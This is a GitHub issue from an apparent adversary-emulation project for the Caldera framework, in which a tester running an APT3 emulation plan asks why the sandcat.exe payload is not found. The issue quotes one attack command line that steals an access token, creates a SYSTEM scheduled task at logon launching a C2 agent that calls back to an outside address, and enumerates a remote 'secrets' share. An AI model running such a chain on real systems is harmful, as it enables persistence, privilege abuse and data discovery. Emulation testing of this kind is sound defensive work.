[Plugin - Phase 16 ] 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083)

[Cyb3rWard0g]

Good evening,

this issue goes along with:

• [Plugin - Phase 9 - 3.A.1] Bypass User Account Control (T1088) #1
• [Plugin - Phase 10 - 3.B.1] Process Discovery (T1057), 3.C.1 - Process Injection (T1055) #2
• [Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update  #3

because they are from the same setup and operation execution (APT3 - Full)

When I got to 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083) I got the following message:

Import-Module .\StealToken.ps1 -Verbose -Force;StealToken;CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\\\FILE001\secrets\hklm\system\currentcontrolset\control\terminal server"';CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON /RU SYSTEM';CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b \\FILE001\secrets';CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';RevertToSelf;
Payload(s) not available: sandcat.exe

I was a little confused with the "sandcat.exe" binary. It is in C:\users\public\sandcat.exe as shown below:

and this is because when I ran the PowerShell command, it downloaded it there:

However, I believe the script believes it is on the path where the session is running from? Maybe?. However, as you can see below, I ran the powershell script from the users pgustavo default path. I dont know if this makes sense? 😆

Does it make sense to update the script and set it to point to C:\users\public\sandcat.exe since it is the default location for when it is downloaded? or I can just download the payload and run it from wherever I want? You guys have this in the WIki Step 1 began with a legitimate user executing the payload on the victim host.. I believe that maybe an additional comment can be added to the WIKI to be very specific on why you need to download it rather than using the other options available in Caldera for initial access? Maybe?. Just sharing some thoughts and my initial test 👍 . I am so happy the other other steps worked perfectly fine and I was able to collect the data generated by each step 😉 .

Thank you in advance!

[jondricek]

Admin note: closing all remaining issues and pull requests prior to archiving the repository